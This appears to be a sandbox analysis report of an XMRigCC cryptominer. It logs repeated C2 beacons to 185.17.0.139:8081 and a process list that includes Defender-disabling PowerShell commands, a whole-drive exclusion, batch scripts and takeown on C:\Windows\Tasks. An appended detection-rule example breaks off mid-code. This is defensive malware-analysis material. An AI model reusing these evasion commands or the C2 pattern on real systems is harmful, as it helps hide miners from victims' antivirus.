    Host: 185.17.0.139:8081
    User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
Dec 8, 2024 23:02:54.819288015 CET | 334 | IN | HTTP/1.1 200 OK
    Access-Control-Allow-Headers: Content-Type, Authorization
    Access-Control-Allow-Methods: POST, GET, OPTIONS
    Access-Control-Allow-Origin: *
    Connection: close
    Content-Length: 52
    Content-Type: application/json
    WWW-Authenticate: Basic
    WWW-Authenticate: Bearer
    Data Raw: 7b 22 63 6f 6e 74 72 6f 6c 5f 63 6f 6d 6d 61 6e 64 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 53 54 41 52 54 22 2c 22 70 61 79 6c 6f 61 64 22 3a 22 22 7d 7d
    Data Ascii: {"control_command":{"command":"START","payload":""}}

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49752 | 185.17.0.139 | 8081 | 2044 | C:\Windows\Tasks\ApplicationsFrameHost.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 23:03:04.176217079 CET | 307 | OUT | POST /client/setClientStatus?clientId=124406 HTTP/1.1
    Accept: *//*
    Accept: application/json
    Authorization: Bearer mySecret
    Connection: close
    Content-Length: 1020
    Content-Type: application/json
    Host: 185.17.0.139:8081
    User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
Dec 8, 2024 23:03:05.513887882 CET | 282 | IN | HTTP/1.1 200 OK
    Access-Control-Allow-Headers: Content-Type, Authorization
    Access-Control-Allow-Methods: POST, GET, OPTIONS
    Access-Control-Allow-Origin: *
    Connection: close
    Content-Length: 52
    Content-Type: application/json
    WWW-Authenticate: Basic
    WWW-Authenticate: Bearer

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49773 | 185.17.0.139 | 8081 | 2044 | C:\Windows\Tasks\ApplicationsFrameHost.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 23:03:13.734752893 CET | 307 | OUT | POST /client/setClientStatus?clientId=124406 HTTP/1.1
    Accept: *//*
    Accept: application/json
    Authorization: Bearer mySecret
    Connection: close
    Content-Length: 1279
    Content-Type: application/json
    Host: 185.17.0.139:8081
    User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
Dec 8, 2024 23:03:15.226041079 CET | 282 | IN | HTTP/1.1 200 OK
    Access-Control-Allow-Headers: Content-Type, Authorization
    Access-Control-Allow-Methods: POST, GET, OPTIONS
    Access-Control-Allow-Origin: *
    Connection: close
    Content-Length: 52
    Content-Type: application/json
                                                                                                                                                                                                  WWW-Authenticate: Basic
                                                                                                                                                                                                  WWW-Authenticate: Bearer


Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49795 | Destination IP: 185.17.0.139 | Destination Port: 8081 | PID: 2044 | Process: C:\Windows\Tasks\ApplicationsFrameHost.exe

Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 23:03:24.451493979 CET | 307 | OUT | POST /client/setClientStatus?clientId=124406 HTTP/1.1
    Accept: *//*
    Accept: application/json
    Authorization: Bearer mySecret
    Connection: close
    Content-Length: 1047
    Content-Type: application/json
    Host: 185.17.0.139:8081
    User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
Dec 8, 2024 23:03:25.791791916 CET | 282 | IN | HTTP/1.1 200 OK
    Access-Control-Allow-Headers: Content-Type, Authorization
    Access-Control-Allow-Methods: POST, GET, OPTIONS
    Access-Control-Allow-Origin: *
    Connection: close
    Content-Length: 52
    Content-Type: application/json
    WWW-Authenticate: Basic
    WWW-Authenticate: Bearer


Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49820 | Destination IP: 185.17.0.139 | Destination Port: 8081 | PID: 2044 | Process: C:\Windows\Tasks\ApplicationsFrameHost.exe

Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 23:03:33.834790945 CET | 306 | OUT | POST /client/setClientStatus?clientId=124406 HTTP/1.1
    Accept: *//*
    Accept: application/json
    Authorization: Bearer mySecret
    Connection: close
    Content-Length: 933
    Content-Type: application/json
    Host: 185.17.0.139:8081
    User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
Dec 8, 2024 23:03:35.344357014 CET | 282 | IN | HTTP/1.1 200 OK
    Access-Control-Allow-Headers: Content-Type, Authorization
    Access-Control-Allow-Methods: POST, GET, OPTIONS
    Access-Control-Allow-Origin: *
    Connection: close
    Content-Length: 52
    Content-Type: application/json
    WWW-Authenticate: Basic
    WWW-Authenticate: Bearer


Session ID: 9 | Source IP: 192.168.2.4 | Source Port: 49842 | Destination IP: 185.17.0.139 | Destination Port: 8081 | PID: 2044 | Process: C:\Windows\Tasks\ApplicationsFrameHost.exe

Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 23:03:43.833611012 CET | 306 | OUT | POST /client/setClientStatus?clientId=124406 HTTP/1.1
    Accept: *//*
    Accept: application/json
    Authorization: Bearer mySecret
    Connection: close
    Content-Length: 933
    Content-Type: application/json
    Host: 185.17.0.139:8081
    User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
Dec 8, 2024 23:03:45.172362089 CET | 282 | IN | HTTP/1.1 200 OK
    Access-Control-Allow-Headers: Content-Type, Authorization
    Access-Control-Allow-Methods: POST, GET, OPTIONS
    Access-Control-Allow-Origin: *
    Connection: close
    Content-Length: 52
    Content-Type: application/json
    WWW-Authenticate: Basic
    WWW-Authenticate: Bearer


Session ID: 10 | Source IP: 192.168.2.4 | Source Port: 49863 | Destination IP: 185.17.0.139 | Destination Port: 8081 | PID: 2044 | Process: C:\Windows\Tasks\ApplicationsFrameHost.exe

Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 23:03:54.578732967 CET | 307 | OUT | POST /client/setClientStatus?clientId=124406 HTTP/1.1
    Accept: *//*
    Accept: application/json
    Authorization: Bearer mySecret
    Connection: close
    Content-Length: 1160
    Content-Type: application/json
    Host: 185.17.0.139:8081
    User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
Dec 8, 2024 23:03:55.916826963 CET | 282 | IN | HTTP/1.1 200 OK
    Access-Control-Allow-Headers: Content-Type, Authorization
    Access-Control-Allow-Methods: POST, GET, OPTIONS
    Access-Control-Allow-Origin: *
    Connection: close
    Content-Length: 52
    Content-Type: application/json
    WWW-Authenticate: Basic
    WWW-Authenticate: Bearer


Session ID: 11 | Source IP: 192.168.2.4 | Source Port: 49888 | Destination IP: 185.17.0.139 | Destination Port: 8081 | PID: 2044 | Process: C:\Windows\Tasks\ApplicationsFrameHost.exe

Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 23:04:03.994983912 CET | 306 | OUT | POST /client/setClientStatus?clientId=124406 HTTP/1.1
    Accept: *//*
    Accept: application/json
    Authorization: Bearer mySecret
    Connection: close
    Content-Length: 934
    Content-Type: application/json
    Host: 185.17.0.139:8081
    User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
Dec 8, 2024 23:04:05.495356083 CET | 334 | IN | HTTP/1.1 200 OK
    Access-Control-Allow-Headers: Content-Type, Authorization
    Access-Control-Allow-Methods: POST, GET, OPTIONS
    Access-Control-Allow-Origin: *
    Connection: close
    Content-Length: 52
    Content-Type: application/json
    WWW-Authenticate: Basic
    WWW-Authenticate: Bearer
    Data Raw: 7b 22 63 6f 6e 74 72 6f 6c 5f 63 6f 6d 6d 61 6e 64 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 53 54 41 52 54 22 2c 22 70 61 79 6c 6f 61 64 22 3a 22 22 7d 7d
    Data Ascii: {"control_command":{"command":"START","payload":""}}


Session ID: 12 | Source IP: 192.168.2.4 | Source Port: 49909 | Destination IP: 185.17.0.139 | Destination Port: 8081 | PID: 2044 | Process: C:\Windows\Tasks\ApplicationsFrameHost.exe

Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 23:04:14.032143116 CET | 307 | OUT | POST /client/setClientStatus?clientId=124406 HTTP/1.1
    Accept: *//*
    Accept: application/json
    Authorization: Bearer mySecret
    Connection: close
    Content-Length: 1148
    Content-Type: application/json
    Host: 185.17.0.139:8081
    User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
Dec 8, 2024 23:04:15.378420115 CET | 282 | IN | HTTP/1.1 200 OK
    Access-Control-Allow-Headers: Content-Type, Authorization
    Access-Control-Allow-Methods: POST, GET, OPTIONS
    Access-Control-Allow-Origin: *
    Connection: close
    Content-Length: 52
    Content-Type: application/json
    WWW-Authenticate: Basic
    WWW-Authenticate: Bearer


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
13          192.168.2.4  49930        185.17.0.139    8081              2044  C:\Windows\Tasks\ApplicationsFrameHost.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 8, 2024 23:04:24.004045963 CET  307                OUT        POST /client/setClientStatus?clientId=124406 HTTP/1.1
    Accept: *//*
    Accept: application/json
    Authorization: Bearer mySecret
    Connection: close
    Content-Length: 1058
    Content-Type: application/json
    Host: 185.17.0.139:8081
    User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
Dec 8, 2024 23:04:25.403692007 CET  282                IN         HTTP/1.1 200 OK
    Access-Control-Allow-Headers: Content-Type, Authorization
    Access-Control-Allow-Methods: POST, GET, OPTIONS
    Access-Control-Allow-Origin: *
    Connection: close
    Content-Length: 52
    Content-Type: application/json
    WWW-Authenticate: Basic
    WWW-Authenticate: Bearer


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
14          192.168.2.4  49951        185.17.0.139    8081              2044  C:\Windows\Tasks\ApplicationsFrameHost.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 8, 2024 23:04:34.004443884 CET  307                OUT        POST /client/setClientStatus?clientId=124406 HTTP/1.1
    Accept: *//*
    Accept: application/json
    Authorization: Bearer mySecret
    Connection: close
    Content-Length: 1058
    Content-Type: application/json
    Host: 185.17.0.139:8081
    User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
Dec 8, 2024 23:04:35.380561113 CET  282                IN         HTTP/1.1 200 OK
    Access-Control-Allow-Headers: Content-Type, Authorization
    Access-Control-Allow-Methods: POST, GET, OPTIONS
    Access-Control-Allow-Origin: *
    Connection: close
    Content-Length: 52
    Content-Type: application/json
    WWW-Authenticate: Basic
    WWW-Authenticate: Bearer


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
15          192.168.2.4  49972        185.17.0.139    8081              2044  C:\Windows\Tasks\ApplicationsFrameHost.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 8, 2024 23:04:44.017105103 CET  306                OUT        POST /client/setClientStatus?clientId=124406 HTTP/1.1
    Accept: *//*
    Accept: application/json
    Authorization: Bearer mySecret
    Connection: close
    Content-Length: 944
    Content-Type: application/json
    Host: 185.17.0.139:8081
    User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
Dec 8, 2024 23:04:45.436894894 CET  282                IN         HTTP/1.1 200 OK
    Access-Control-Allow-Headers: Content-Type, Authorization
    Access-Control-Allow-Methods: POST, GET, OPTIONS
    Access-Control-Allow-Origin: *
    Connection: close
    Content-Length: 52
    Content-Type: application/json
    WWW-Authenticate: Basic
    WWW-Authenticate: Bearer


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
16          192.168.2.4  49999        185.17.0.139    8081              2044  C:\Windows\Tasks\ApplicationsFrameHost.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 8, 2024 23:04:54.032911062 CET  306                OUT        POST /client/setClientStatus?clientId=124406 HTTP/1.1
    Accept: *//*
    Accept: application/json
    Authorization: Bearer mySecret
    Connection: close
    Content-Length: 944
    Content-Type: application/json
    Host: 185.17.0.139:8081
    User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
Dec 8, 2024 23:04:55.520282984 CET  282                IN         HTTP/1.1 200 OK
    Access-Control-Allow-Headers: Content-Type, Authorization
    Access-Control-Allow-Methods: POST, GET, OPTIONS
    Access-Control-Allow-Origin: *
    Connection: close
    Content-Length: 52
    Content-Type: application/json
    WWW-Authenticate: Basic
    WWW-Authenticate: Bearer


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
17          192.168.2.4  50021        185.17.0.139    8081              2044  C:\Windows\Tasks\ApplicationsFrameHost.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 8, 2024 23:05:04.037138939 CET  306                OUT        POST /client/setClientStatus?clientId=124406 HTTP/1.1
    Accept: *//*
    Accept: application/json
    Authorization: Bearer mySecret
    Connection: close
    Content-Length: 945
    Content-Type: application/json
    Host: 185.17.0.139:8081
    User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
Dec 8, 2024 23:05:05.397495985 CET  282                IN         HTTP/1.1 200 OK
    Access-Control-Allow-Headers: Content-Type, Authorization
    Access-Control-Allow-Methods: POST, GET, OPTIONS
    Access-Control-Allow-Origin: *
    Connection: close
    Content-Length: 52
    Content-Type: application/json
    WWW-Authenticate: Basic
    WWW-Authenticate: Bearer


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
18          192.168.2.4  50028        185.17.0.139    8081              2044  C:\Windows\Tasks\ApplicationsFrameHost.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 8, 2024 23:05:14.037316084 CET  307                OUT        POST /client/setClientStatus?clientId=124406 HTTP/1.1
    Accept: *//*
    Accept: application/json
    Authorization: Bearer mySecret
    Connection: close
    Content-Length: 1035
    Content-Type: application/json
    Host: 185.17.0.139:8081
    User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
Dec 8, 2024 23:05:15.377557993 CET  282                IN         HTTP/1.1 200 OK
    Access-Control-Allow-Headers: Content-Type, Authorization
    Access-Control-Allow-Methods: POST, GET, OPTIONS
    Access-Control-Allow-Origin: *
    Connection: close
    Content-Length: 52
    Content-Type: application/json
    WWW-Authenticate: Basic
    WWW-Authenticate: Bearer


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
19          192.168.2.4  50030        185.17.0.139    8081              2044  C:\Windows\Tasks\ApplicationsFrameHost.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 8, 2024 23:05:24.099725008 CET  306                OUT        POST /client/setClientStatus?clientId=124406 HTTP/1.1
    Accept: *//*
    Accept: application/json
    Authorization: Bearer mySecret
    Connection: close
    Content-Length: 944
    Content-Type: application/json
    Host: 185.17.0.139:8081
    User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
Dec 8, 2024 23:05:25.513113976 CET  282                IN         HTTP/1.1 200 OK
    Access-Control-Allow-Headers: Content-Type, Authorization
    Access-Control-Allow-Methods: POST, GET, OPTIONS
    Access-Control-Allow-Origin: *
    Connection: close
    Content-Length: 52
                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                  WWW-Authenticate: Basic
                                                                                                                                                                                                  WWW-Authenticate: Bearer


Session ID: 20 | Source IP: 192.168.2.4 | Source Port: 50033 | Destination IP: 185.17.0.139 | Destination Port: 8081 | PID: 2044 | Process: C:\Windows\Tasks\ApplicationsFrameHost.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 23:05:34.095611095 CET | 307 | OUT | POST /client/setClientStatus?clientId=124406 HTTP/1.1
Accept: *//*
Accept: application/json
Authorization: Bearer mySecret
Connection: close
Content-Length: 1058
Content-Type: application/json
Host: 185.17.0.139:8081
User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
Dec 8, 2024 23:05:35.809159994 CET | 282 | IN | HTTP/1.1 200 OK
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Methods: POST, GET, OPTIONS
Access-Control-Allow-Origin: *
Connection: close
Content-Length: 52
Content-Type: application/json
WWW-Authenticate: Basic
WWW-Authenticate: Bearer


Session ID: 21 | Source IP: 192.168.2.4 | Source Port: 50035 | Destination IP: 185.17.0.139 | Destination Port: 8081 | PID: 2044 | Process: C:\Windows\Tasks\ApplicationsFrameHost.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 23:05:44.391530991 CET | 307 | OUT | POST /client/setClientStatus?clientId=124406 HTTP/1.1
Accept: *//*
Accept: application/json
Authorization: Bearer mySecret
Connection: close
Content-Length: 1058
Content-Type: application/json
Host: 185.17.0.139:8081
User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
Dec 8, 2024 23:05:45.800101042 CET | 282 | IN | HTTP/1.1 200 OK
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Methods: POST, GET, OPTIONS
Access-Control-Allow-Origin: *
Connection: close
Content-Length: 52
Content-Type: application/json
WWW-Authenticate: Basic
WWW-Authenticate: Bearer


Session ID: 22 | Source IP: 192.168.2.4 | Source Port: 50038 | Destination IP: 185.17.0.139 | Destination Port: 8081 | PID: 2044 | Process: C:\Windows\Tasks\ApplicationsFrameHost.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 23:05:54.332360029 CET | 307 | OUT | POST /client/setClientStatus?clientId=124406 HTTP/1.1
Accept: *//*
Accept: application/json
Authorization: Bearer mySecret
Connection: close
Content-Length: 1058
Content-Type: application/json
Host: 185.17.0.139:8081
User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
Dec 8, 2024 23:05:55.716797113 CET | 282 | IN | HTTP/1.1 200 OK
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Methods: POST, GET, OPTIONS
Access-Control-Allow-Origin: *
Connection: close
Content-Length: 52
Content-Type: application/json
WWW-Authenticate: Basic
WWW-Authenticate: Bearer


Session ID: 23 | Source IP: 192.168.2.4 | Source Port: 50040 | Destination IP: 185.17.0.139 | Destination Port: 8081 | PID: 2044 | Process: C:\Windows\Tasks\ApplicationsFrameHost.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 23:06:04.599438906 CET | 307 | OUT | POST /client/setClientStatus?clientId=124406 HTTP/1.1
Accept: *//*
Accept: application/json
Authorization: Bearer mySecret
Connection: close
Content-Length: 1057
Content-Type: application/json
Host: 185.17.0.139:8081
User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
Dec 8, 2024 23:06:05.945744038 CET | 334 | IN | HTTP/1.1 200 OK
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Methods: POST, GET, OPTIONS
Access-Control-Allow-Origin: *
Connection: close
Content-Length: 52
Content-Type: application/json
WWW-Authenticate: Basic
WWW-Authenticate: Bearer
Data Raw: 7b 22 63 6f 6e 74 72 6f 6c 5f 63 6f 6d 6d 61 6e 64 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 53 54 41 52 54 22 2c 22 70 61 79 6c 6f 61 64 22 3a 22 22 7d 7d
Data Ascii: {"control_command":{"command":"START","payload":""}}


Target ID: 0
Start time: 17:01:57
Start date: 08/12/2024
Path: C:\Users\user\Desktop\IYXE4Uz61k.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\IYXE4Uz61k.exe"
Imagebase: 0x870000
File size: 50'529'184 bytes
MD5 hash: 0C1CB4CC583AABC07F0482F7E0767ECF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 17:01:57
Start date: 08/12/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $True
Imagebase: 0x960000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 17:01:57
Start date: 08/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                  Start time:17:02:00
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath c:\
                                                                                                                                                                                                  Imagebase:0x960000
                                                                                                                                                                                                  File size:433'152 bytes
                                                                                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                  Start time:17:02:00
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                  Start time:17:02:05
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\programdata\ru.bat" "
                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                  Start time:17:02:05
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                  Start time:17:02:05
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"
                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                  Start time:17:02:05
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                  Start time:17:02:05
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\chcp.com
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:chcp 65001
                                                                                                                                                                                                  Imagebase:0xe00000
                                                                                                                                                                                                  File size:12'800 bytes
                                                                                                                                                                                                  MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                  Start time:17:02:05
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:tasklist /FI "IMAGENAME eq Superfetch.exe"
                                                                                                                                                                                                  Imagebase:0xc70000
                                                                                                                                                                                                  File size:79'360 bytes
                                                                                                                                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                  Start time:17:02:05
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\find.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:find /I /N "Superfetch.exe"
                                                                                                                                                                                                  Imagebase:0xba0000
                                                                                                                                                                                                  File size:14'848 bytes
                                                                                                                                                                                                  MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                  Start time:17:02:05
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:takeown /f c:\windows\tasks
                                                                                                                                                                                                  Imagebase:0xb90000
                                                                                                                                                                                                  File size:51'712 bytes
                                                                                                                                                                                                  MD5 hash:A9AB2877AE82A53F5A387B045BF326A4
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

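The command lines recorded for Target IDs 4 through 13 above form a small defense-evasion and persistence-check chain: a whole-drive Defender exclusion (Set-MpPreference -ExclusionPath c:\), batch files run out of C:\ProgramData, a tasklist | find pair that checks whether a process named Superfetch.exe is already running, and takeown on C:\Windows\Tasks. Note also that the sandbox lists these 32-bit children under C:\Windows\SysWOW64 even though their command lines name System32: a 32-bit parent launching "System32\x.exe" is redirected by WoW64 file-system redirection, so detection content that keys only on the image path misses the command line and vice versa. The following is an added example, not part of the Joe Sandbox report: a small rule set run over constructed process-creation events modelled on the rows above (the event field names and the severity scale are this example's own assumptions, not Joe Sandbox fields), including a benign narrow-exclusion control event to show the scoring distinction.

```python
import re
from dataclasses import dataclass

SEVERITY_RANK = {"info": 0, "low": 1, "medium": 2, "high": 3}

# Constructed process-creation events modelled on the process list above.
# Field names ("id", "image", "cmdline") are this example's own, not sandbox fields.
SAMPLE_EVENTS = [
    {"id": 4, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" "
                "Set-MpPreference -ExclusionPath c:\\"},
    {"id": 6, "image": r"C:\Windows\SysWOW64\cmd.exe",
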